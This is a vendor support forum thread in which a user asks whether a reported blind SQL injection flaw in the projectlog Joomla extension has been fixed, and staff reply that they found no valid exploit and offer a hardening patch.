The Thinkery

Not finding what you're looking for? Don't hesitate to contact us!

Before Posting...

Before posting questions in the forums, please be sure to read the FAQs by clicking on the FAQs link in the sidebar product menu. You must be logged in and have a valid subscription to access the SUPPORT FORUMS.
×
Support Policy Notice

As outlined in our Rules section (though never closely followed by our staff!), effective immediately we will no longer be taking time to provide customizations of our products.

Blind SQL injection Vulnerability

  • daviestar
  • daviestar's Avatar Topic Author
  • Offline
  • Puzzler
  • Puzzler
More
10 years 10 months ago #13396 by daviestar
daviestar created the topic: Blind SQL injection Vulnerability
Hello thinkery

I've been working with projectlog for a while now, and I have to say.. it has been an absolute pleasure to style and customise - if only other extensions were as clean as this one!

After a recent search on google I came across this page: http://www.1337day.com/exploits/13150

Could you please confirm this vulnerability has been locked down? I haven't been able to find any info on your site about it.

Thanks again, I will be crediting you on my site once it's finished.. I'll let you know when I do.

Dave

Please Log in or Create an account to join the conversation.

More
10 years 10 months ago #13406 by vinny
vinny replied the topic: Re: Blind SQL injection Vulnerability
Hi Dave - we can't confirm that this is a valid exploit (normally we hear about it immediately and release a patch - the link you posted is over a year old and we would have heard about it before now!). We've double checked the cat model and verified that it will only accept integers to avoid sql injections; however, we did find a couple of instances where we could be a little more strict - I've attached a patch file.

You can unzip the attached and replace the corresponding files via FTP (for example: site/models/cat.php will replace your front end 'com_projectlog/models/cat.php). Please back up the files you replace and let us know if you come across any issues - if all works as expected we'll add these changes to the zip download just in case! Thanks.

Attachment patch_bsqli_projectlog.zip not found


Vinny - The Thinkery
Good reviews on the JED make us work harder :) | IProperty | Work Force | Report Card
Attachments:

Please Log in or Create an account to join the conversation.

Moderators: vinny
Time to create page: 0.372 seconds